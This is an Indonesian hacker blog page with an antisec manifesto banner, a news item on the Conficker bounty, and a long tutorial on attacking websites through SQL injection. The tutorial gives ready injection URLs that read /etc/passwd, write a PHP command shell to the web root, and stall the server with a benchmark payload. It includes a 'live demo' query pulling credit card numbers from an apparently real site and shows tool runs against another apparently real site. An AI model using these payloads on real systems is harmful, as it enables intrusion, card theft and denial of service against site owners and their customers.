_____ __ _____ ___ _____ ___ _____ _____ _____ _____ _____ _____ _____ _____ ____ _____ _ _ _ _____ | __|| | | | ||_ | | | || | | | __|| __|| __ || | || __|| __ | | || __| | \ | || | | || | | | __|| |__ | | | _| |_ | | | ||_ | |__ || __|| -|| | || __|| -| |- -||__ | | | || | || | | || | | | |_____||_____| \___/ |_____||_|___| |_| |_____||_____||__|__| \___/ |_____||__|__| |_____||_____| |____/ |_____||_____||_|___| I DONT WANT TO BE FAME , I DONT WANT TO BE ANY EZINE , I JUST WANT TO SHARE KNOWLEDGE
, ----. ~ Fuck full-disclosure - - ` ~ Fuck the security industry ,__.,' \ ~ Keep 0days private .' *` ~ Hack everyone you can and then hack some more / | | / **\ ~ Blend in. . / ****. ~ Get trusted. | mm | ****| ~ Trust no one. \ | ****| ~ Own everyone. ` ._______ \ ****/ ~ Disclose nothing. \ /`---' ~ Destroy everything. \___( ~ Take back the scene /~~~~\ ~ Never sell out, never surrender. / \ ~ Get in as anonymous, Leave with no trace. / | \ ~ This your Fucking IP | | \ ~ This your Fucking ISP , ~~ . |, ~~ . | |\ ~ FUCK OFF I've got enough friends !!!! ( |||| ) ( |||| )(,,,)` ( |||||| )-( |||||| ) | ^ ( |||||| ) ( |||||| ) |'/ ( |||||| )-( |||||| )___,'- ( |||| ) ( |||| ) ` ~~ ' ` ~~ '

[ Blog ]

[ History ]


AYO TANGKAP MEREKA !!!!

Tangkap Pembuat Virus Confiker dapat 3 Milyar
Perusahaan Software raksasa Microsoft menawarkan hadiah sebesar $250,000 atau sekitar Rp 3 Milyar untuk informasi tentang keberadaan pembuat virus komputer Conficker atau di Indonesia sering disebut virus Recycler.. Dengan informasi ini,Microsoft akan melakukan penangkapan dan penghukuman pada kelompok pembuat virus yang telah menginfeksi jutaan komputer tersebut.

Para ahli mengatakan satu laptop dapat menyebarkan virus ini ke seluruh jaringan komputer.Sejauh ini, mereka dibingungkan tentang apa sebenarnya tujuan utama virus Conficker ini. Virus ini telah membuktikan bahwa penyebarannya sebagai salah satu penyebaran terbesar yang pernah terjadi.

Virus ini memanfaatkan sebuah bug di Microsoft Windows untuk menginfeksi sebagian besar jaringan perusahaan, walaupun virus ini belum menyebabkan kerusakan apapun tapi dia memiliki hubungan dengan titik asal pembuatnya, ini artinya dia dapat menerima perintah langsung dari pembuatnya untuk membuat kerusakan.

Microsoft telah membagikan patch untuk memperbaiki bug ini, tetapi jika satu PC terinfeksi di sebuah jaringan besar, virus ini dapat menyebar tanpa terkendali sehingga sering menginfeksi ulang PC yang sudah diperbaiki, sehingga patch yang sudah dilakukan menjadi percuma.Ancaman virus ini mendesak Microsoft yang bekerjasama dengan industri teknologi lainnya untuk mengumumkan hadiah sebesar $250,000 untuk informasi tentang keberadaan pembuat virus Conficker ini.“Sebagai bagian dari usaha keamanan berkelanjutan Microsoft, kami tak henti-hentinya mencari berbagai macam cara dan pengembangan metodologi untuk melindungi pelanggan kami” kata George Stathakopoulos, dari Microsoft's Trustworthy Computing Group.

Mikko Hypponen, pemimpin penelitian di anti-virus F-Secure mengatakan banyaknya penyebaran virus sebenarnya tidak diketahui, tapi dalam 24 jam terakhir perusahaannya memonitor sinyal Conficker dari dua juta alamat protokol Internet.“Itu sangat banyak” dia bercerita pada CNN. “Dan satu alamat IP disini tidak berarti satu komputer yang terinfeksi, itu sebenarnya berarti setidaknya satu komputer terinfeksi.”

“Sebagian besar alamat-alamat IP adalah proxy atau firewall perusahan, yang dibelakangnya terdapat lebih banyak PC yang terinfeksi. Jadi, ini membuat tidak mungkin untuk memperkirakan total banyaknya sistem yang terinfeksi. Jadi penyebarannya itu sangat besar” Microsoft sebelumnya sudah pernah membayar hadiah yang sama untuk seseorang yang menginformasikan keberadaan pembuat virus Sasser, salah satu virus terkenal pada tahun 2004. Pelaku sudah dibawa ke Jerman, dimana dia dijatuhi hukuman satu tahun kemudian.

Jadi, walaupun hampir tidak mungkin pembuat virus Conficker ini berada di Indonesia, jika Anda tahu tentang keberadaan pembuat virus ini segeralah melapor ke Microsoft, Anda akan langsung menjadi milyuner karena mendapatkan hadiah Rp 3 Milyar. Untuk pembuat virus lokal, segeralah bertobat karena tidak menutup kemungkinan Anda juga bisa dipenjarakan akibat terus membuat virus dan menyebarkannya di Indonesia.

Labels:


On 3/13/09 at 6:46 AM


Serangan Attacker Part I

|-----------------------------------------------------|
| [+]Author : ELV1N4 |
| [+]contact : ELV1N@doyan.cc |
| [+]Blog : http://elv1n4.blogspot.com |
| [-]Gretzz : #SolpotCreW,#nyubicrew, |
| #noscan, #hitamputih, cyberdos familly |
|-----------------------------------------------------|
-------------------------------------------------------

------------------------------------------------------
-> TAG OF CONCEPT <-
------------------------------------------------------
|
|
|----------> Manual SQLi
| |
| |
| |-----> penambahan Nilai Load_File
| | |
| | |
| | |--> mencuri cookies dari Load_file
| |
| |
| |
| |-----> penambahan Into OutFile
| |
| |
| |
| |
| |
| |-----> penambahan Nilai Benchamark
| |
| |
| |
| |-----> Penambahan Nilai Cast
| |
| |
| |
| |-----> Penambahan Nilai BCP
|
|
|
|
|----------> AUTOMATIC SQLi
| |
| |
| |-----> penggunaan SQLMAP
| |
| |
| |
| |-----> penggunaan FUZZER
| |
| |
| |
| |-----> penggunaan BOTSCAN ( IRC )
|
|
|
|
|
|--------------penutup



------------------------------------------------------
-> END OF FILES <-
------------------------------------------------------

------------------------------------------------------
MANUAL SQLi
------------------------------------------------------

Contoh targetnya:
http://www.target.com

vulnernya:
http://www.target.com/store.php?c=1[sql]


cari jumlah kolomnya sampai true:
http://www.target.com/store.php?c=1'%20union%20select%201,2,3,4/*

jika hasilnya true kita coba untuk mencari nama tabel.


http://www.target.com/store.php?c=1'%20union%20select%201,TABLE_NAME,3,4%20from%20information_schema.tables%20where%20table_schema=database()%20limit%201,1/*


Dengan sql diatas kita dapat menemukan tabel ke 2 yaitu ELV1N4

coba looping ke tabel 2

http://www.target.com/store.php?c=1'%20union%20select%201,TABLE_NAME,3,4%20from%20information_schema.tables%20where%20table_schema=database()%20limit%202,1/*

Dengan sql diatas kita dapat menemukan tabel ke 2 yaitu CUTEBANGET

kita dapat mecari tabel ke 3 dan setrusnya dengan menambah angaka di depan limit.

cari kolomnya

SQL:
http://www.target.com/store.php?c=1'%20union%20select%201,COLUMN_NAME,3,4%20from%20information_schema.COLUMNS%20where%20table_name='ELV1N4'%20and%20table_schema=database()limit%201,1/*

dengan injeksi seperti itu kita pasti mendapatkan kolom 1 pada tabel Misalnya ELV1N4 yaitu luchu.

dengan menambah angka di depan limit kita dapat menemukan kolom ke 2 dst.

Dan selanjutnya anda bisa berkreasi sendiri dengan menambahkan dan menyalahgunakan String" Sensitif Pada MSQL

------------------------------------------------------
penambahan Load_File
------------------------------------------------------

LOAD File seperti halnya perintah untuk menampilkan File yang kita hendaki.
contoh kecilnya, jika kita mengganti angka yang keluar pada SQLinjecktion dengan string LOAD FILE,
maka perintah Loadfile akan memunculkan patch file yang mau kita lihat, format penulisan injeksinya seperti LOAD_FILE(etc/passwd) dengan catatan MSQL hanya bisa membaca angka Hexa, jadi nonsen kita gunakan Huruf biasa atau nomor, contohnya. untuk melihat etc/passwd = 0x2f6574632f706173737764
nah dengan itu kita bisa melakukan Loadfile Etc/passwd

contoh


victim:
http://www.target.com/store.php?c=


vuln:
http://www.target.com/store.php?c= [Bisa Di injeksikan SQLi dan mengijinkan Akses LoadFIle Tentunya [w00t] ]


scari jumlah kolomnya sampai true atau browser udah ga ngeluarin error kembali.


%20union%20select%201,2/*

%20union%20select%201,2,3,4,5/*

%20union%20select%201,2,3,4,5,6,7/*

http://target.com/store.php?id=-1%20union%20select%201,2,3,4,5,6,7/*

ganti angka yang keluar dengan string LOAD_FILE.

http://target.com/store.php?c=-1%20union%20select%201,LOAD_FILE(0x2f6574632f706173737764),3,4,5,6,7/*

------------------------------------------------------
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
cantik:x:4:7:lp:/var/spool/lpd:/sbin/nologin
elv1n4:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
------------------------------------------------------
wah wah keliatan tuh ETC/passwdnya, kaya Serangan LFI ( local file inclusion ) tinggal di lanjut Nger00t via ssh atau sftp aja
trik magis keberuntungan , dengan menyamakan nama dan username nya aja .heuheuheuheu :P
tapi ingat kernel korban juga harus kita tau loh.
nah bagaimana nih , klo mau ngeroot tapi ga tau kernel korban,
tar malah salah masukin local exploits lagi
heuheuheuhe :
jangan khawatir kita masih bisa mengganti ETC/PASSWD dengan /etc/issue
jangan lupa untuk konvert text ke hexa . contoh : etc/issue = 0x2F6574632F6973737565

http://target.com/store.php?c=-1%20union%20select%201,LOAD_FILE(0x2F6574632F6973737565),3,4,5,6,7/*

FreeBSD/i386

Kernel \n on an \l

wEw . heuheuheuheu :P
cari aja sendiri exploitnya , atau disclosure aja yang punya antisec movement
atau bisa di cari disini aja . http://abhie.org/r00t/

ini cheat sheet yang bisa kita buka ^_^ dalam akeses load_file

/etc/init.d/apache
/etc/init.d/apache2
/etc/httpd/httpd.conf
/etc/apache/apache.conf
/etc/apache/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf
/home/apache/httpd.conf
/home/apache/conf/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/default_vhost.include


hmmm.. kepikiran ga, klo mau tanem phpshell ?
heuheuheuheu :P
otak atik sendiri, klo misalkan memang mengijinkan untuk loadfile, kenapa ga coba aja masuk ke proc/self/environ atau gunain teknik into outfile biar bisa tanam backdoor :D

wahhh wah , bahasnya nanti aja itu :D ,udah OOT nih

------------------------------------------------------
Mencuri Cookies dari Load_file
------------------------------------------------------
dalam SQLi Load_file tentunya kita bisa mengeluarkan perintah" yang berpotensi minim sampai berpotensi berbahaya.
^_^
ok.
kita coba gunakan metode serangan Lama yang sangat berbahaya ^_^ ( XSS )
XSS mempunyai variant serangan :
contoh:







sedikit contoh diatas jika kita rangkum dan kembangkan , maka script diatas akan menjadi senjata untuk kita ^_^
ya seperti penanaman script JAVA untuk mencuri Session id, ataupun stealling cookies dari script alert ^_^
ok mungkin cukup sudah vina menjelaskan sedikit tentang xss ^_^

mari kita mulai bahas kembali topictnya ^_^

dalam penambahan concept pengambilan cookies ini, webvictim tidak akan bisa membaca file berupa script tunggal/ javascript,
maka tentunya kita harus merubah javascript kita menjadi code assci agar webvictim dapat mengeksekusi perintahnya ^_^
ok mari lanjutkan . pertama" buka situs http://easycalculation.com/ascii-hex.php
untuk harus merubah " " kedalam bentuk ascii
dan akan menghasilkan
60 115 99 114 105 112 116 62 97 108 101 114 116 40 39 69 76 86 49 78 52 39 41 60 115 99 114 105 112 116 62 97 108 101 114 116 40 39 69 76 86 49 78 52 39 41 60 47 115 99 114 105 112 116 62

nah setelah itu kita harus memisahkan setiap angka dengan tanda ( , )

menjadi

60,115,99,114,105,112,116,62,97,108,101,114,116,40,39,69,76,86,49,78,52,39,41,60,115,99,114,105,112,116,62,97,108,101,114,116,40,39,69,76,86,49,78,52,39,41,60,47,115,99,114,105,112,116,62


ok

lalu kita masukan kedalam Loadfile webvictim dengan mengubah string Load_file menjadi char

contoh:

http://target.com/store.php?c=-1%20union%20select%201,LOAD_FILE(60,115,99,114,105,112,116,62,97,108,101,114,116,40,39,69,76,86,49,78,52,39,41,60,115,99,114,105,112,116,62,97,108,101,114,116,40,39,69,76,86,49,78,52,39,41,60,47,115,99,114,105,112,116,62),3,4,5,6,7/*

menjadi

http://target.com/store.php?c=-1%20union%20select%201,char(60,115,99,114,105,112,116,62,97,108,101,114,116,40,39,69,76,86,49,78,52,39,41,60,115,99,114,105,112,116,62,97,108,101,114,116,40,39,69,76,86,49,78,52,39,41,60,47,115,99,114,105,112,116,62),3,4,5,6,7/*

maka dalam browser kita akan otomatis mengeluarkan isi cookies tersebut yaitu ELV1N4 ^_^



------------------------------------------------------
penambahan Into OutFile
------------------------------------------------------
Outfile adalah salah satu cara kita untuk bisa menuliskan script sederhana pada webvictim
ketentuannya kita harus mempunyai akses membaca (load_file)
halnya sama seperti penambahan Loadfile namun berbeda fungsi
fungsi ini hanya bisa menuliskan code ke dalam webvictim
ok lanjut

catatan penting untuk melakukan serangan ini :
kita harus tau directory dan path yang memiliki akses 777
^_^
contoh :

/templates/
/tmp/
/images/
/cache/

ok kita mulai untuk membuat file vina.php
yang berisi perintah command
isinya:



tuliskan file tersebut ke webvictim
contoh
http://www.target.com/store.php?c=-1%20union%20select%201,'',3,4,5,6,7+into+outfile+'/var/www/httpd/vina.php'--

maka kita bisa akses file vina.php di

http://target.com/vina.php <-- file yang telah kita buat tadi

http://target.com/vina.php?cmd= <--- perintah sesuai keinginan kita ^_^

------------------------------------------------------
penambahan Benchamark
------------------------------------------------------
Pada dasarnya kita bisa saja menyalahgunakan perintah benchmark untuk membuat MySQL menunggu sebentar.
tapi awas hati hati kita akan mengkonsumsi melewati batas server web begitu cepat atau membuat server crash !
biasakan kita dapat akses w00t,


vulnernya:
http://www.target.com/store.php?c=1[bisa di injek SQLi]


http://www.target.com/store.php?c=1%20and%20benchmark(10000000000000000000,md5(2000))/*


waw , pasti servernya akan tidur tuh
heuheuheuheuheu :P


------------------------------------------------------
Penambahan Nilai Cast
------------------------------------------------------

penggunaan Cast memang jarang di optimalkan, tapi adakalanya kita gunakan cast untuk target tertentu untuk merubah sebuah type data ke type data tertentu..
contoh:

http://www.target.com/store.php?c=1


vulnernya:
http://www.target.com/store.php?c=[bisa di SQLi]

caro kolom sql:
http://www.target.com/store.php?c=-1'%20and%201=1%20union%20select1,2,3,4/*

ok true,lanjut

http://www.target.com/store.php?c=1'%20union%20select%201,2,3,4,concat(username,0x3a,password)%20from%20%20tabel_admin/*


pasti akan muncul error kaya gini

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/users/target/public_html/store.php on line 21

nah pasti ada error begini nih . hehuehuehuehue :P pusing kan klo ketemu sama yang kaya ginian. pasti kalian anggap, ini target udah di pacth atau apalah berbagai macam alasannya. heuheuheu :P
tapi eror di atas terjadi karena server tidak bisa membaca type data yang kita masukan.
nah kita coba gunakan cast, untuk merubah type data nya.

http://www.target.com/store.php?c=1'%20union%20select%201,2,3,4,cast(concat(username,0x3a,password)%20as%20binary)%20from%20%20tabel_admin/*



nah pasti berbeda kan hasilnya,
nah disinilah gunanya fungsi cast itu .
merubah user name dan password menjadi binary , sehingga server dapat membacanya.


live demo :


https://www.directorypub.com/SRCH/proddetail.php?aid=00590&&pub_id=-1 union (select 1,null,null,concat_ws(0x3a3a,alpha,approve,acct_no,addr1,addr2,alias,city,country,email,fax,ID,name,name2,phone,postalcode,state,tollfree,cc_type,card_name,cc_num,exp_date,check_no),5,6,7,8,9,10 from ml30nard_DPS.company where length(cc_num)>5+and+length(check_no)>0 and+cast(right(exp_date,2)+as+signed)>9 )--




------------------------------------------------------
Penambahan Nilai BCP
------------------------------------------------------

Menulis file teks. Harus login admin dulu sebelum menggunakan fungsi ini.
contoh :
bcp "SELECT * FROM elv1n4...fooo" queryout c:\inetpub\wwwroot\elv1n4.php -c -Slocalhost -Usa -Pfoobar



------------------------------------------------------
AUTOMATIC SQLi
------------------------------------------------------
cara mempercepat SQLi bisa di terapkan melalui tools",
dengan catatan kita terlebih dahulu mengetahui dan memahami Konsep SQLi manual
ada beberapa contoh tools yang populer di kalangan script kiddie seperti :
penggunaan SQLmap,fuzzer,bahkan botscan,


------------------------------------------------------
penggunaan SQLiMap
------------------------------------------------------

download :: http://sqlmap.sourceforge.net/
:: http://www.python.org/download/releases/2.6/
------------------------------------------------------

-> pertama install terlebih dahulu program python,

-> drop file sqlmap.py ke folder python26

-------------------------------------------------------

./sqlmap.py [options] {-u | -g [Google dork]}

-h, --help help
-u URL, --url=URL target url
-p TESTPARAMETER specify the testable parameter(s)
-g GOOGLEDORK rather than providing a target url, let Google return target hosts as
result of your Google dork expression
--method=HTTPMETHOD HTTP method, GET or POST (default: GET)
--data=DATA data string to be sent through POST
--cookie=COOKIE HTTP Cookie header
--user-agent=UAGENT HTTP User-Agent header
-a USERAGENTSFILE load a random HTTP User-Agent header from file
--basic-auth=BAUTH HTTP Basic Authentication, value: 'username:password'
--digest-auth=DAUTH HTTP Digest Authentication, value: 'username:password'
--proxy=PROXY use a proxy to connect to the target url
--string=STRING string to match in page when the query is valid
--remote-dbms=DBMS perform checks only for this specific DBMS
-f, --fingerprint perform an exaustive database fingerprint
-b, --banner get DBMS banner
--current-user get current DBMS user
--current-db get current DBMS name
--users get DBMS users
--passwords get DBMS users password hashes
--dbs get available databases
--tables get database tables (optional: -D)
--columns get table columns (required: -T and -D)
--dump dump database table entries (required: -T and -D optional: -C)
--dump-all dump all databases tables entries
--file=FILENAME read a specific file content
-e EXPRESSION expression to evaluate
--union-check check for UNION SELECT statement
--union-use use the UNION SELECT statement to retrieve the queries output
-D DB, --database=DB database to enumerate
-T TBL, --table=TBL database table to enumerate
-C COL, --column=COL database table column to enumerate
--exclude-sysdbs exclude system databases when enumerating tables
--eta retrieve each query length and calculate the estimated time of arrival
-v VERBOSE set verbosity level (0-2), default is 0
-o OUTPUTFILE save all data retrieved on a text file
-r, --resume resume queries value from a text file
-----------------------------------------------------------------------------------------
cara kerja :
masuk ke command promt, lalu masuk ke path python26.
lalu ketikan :
------------------------------------------------------
sqlmap.py -u "http//target.com/store?id=1" -v 1
baca petunjuknya di http://sqlmap.sourceforge.net/doc/README.pdf



------------------------------------------------------
penggunaan FUzzer
------------------------------------------------------
penggunaan fuzzer sekarang sudah banyak di gunakan pada script kiddies .
untuk melakukan automatic SQLi, seperti tools schemafuzz, DarkMSQLi, SQLninja, dll
penggunaannya sama lahnya dengan cara SQLmap , dari requerimentnya sampai dengan cara" nya :)

contoh source schemafuzz bisa di cari di situs darkc0de

---

nahd isini kita bisa gunakan
langkah awalnya untuk mencari jumlah paramenter colom yang memiliki vulner

d:\python26\schemafuzz.py -u "http://bjh.co.id/readnews.php?id=14" --findcol

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL:http://bjh.co.id/readnews.php?id=14--
[+] Evasion Used: "+" "--"
[+] 04:53:38
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,5,
[+] Column Length is: 6
[+] Found null column at column #: 1
[+] SQLi URL: http://bjh.co.id/readnews.php?id=14+AND+1=2+UNION+SELECT+0,1,2,3,4,5--
[+] darkc0de URL: http://bjh.co.id/readnews.php?id=14+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5
[-] Done![/quote]
----------------------------------------------------------------------
ini contoh penggunaan DarkMsqli
[quote]|--------------------------------------------------|
| rsauron@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|

[+] URL: http://bjh.co.id/readnews.php?id=14+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5
[+] 03:00:53
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: h13496_bjh
User: h13496_bjh@localhost
Version: 5.0.51a-24+lenny2[+] Beginning table and column fuzzer...
[+] Number of tables names to be fuzzed: 334
[+] Number of column names to be fuzzed: 249
[+] Searching for tables and columns...

[-] [03:08:03]
[-] Total URL Requests: 335
[-] Done
Don't forget to check darkMySQLi.log
nah selanjutnya explorasi sendiri :)



------------------------------------------------------
penggunaan botscan irc
------------------------------------------------------
penggunaan bot irc sering dipakai untuk melakukan scanner bugs SQLi,RFI,XSS,LFi,RFD,RCE,dll.
BOT sering ditulis dengan bahasa Perl,
pembuatan botscan sama saja caranya membuat bot biasa ,
silahkan cari source botscan yang kalian inginkan :)
atau bisa berkreasi sendiri

-------------------------------------------------------
Penuntup
-------------------------------------------------------

saya harap artikel jelek ini dapat berguna bagi kalian semua,
tetap semangat untuk mencari ilmu yah :)

CMIIW
-------------------------------------------------------

------------>END OF FILES<-----------------------------

Labels:


at 6:37 AM



My Profile:


Biography:

short story:

[ Friends Link ]

[ chat with me ]


[ archives ]

[ Notices ]

By title

AYO TANGKAP MEREKA !!!!
Serangan Attacker Part I

By month

2002.03 2002.12 2005.12 2008.11 2009.02 2009.03 2009.04 2009.05 2009.06 2009.07 2009.08 2009.09 2009.10 2009.11 2009.12 2010.01 2010.03



 


elv1n4 Themes v2.0.0 © 2009 by elv1n4

www[dot]elv1n4.anti-sec[dot]org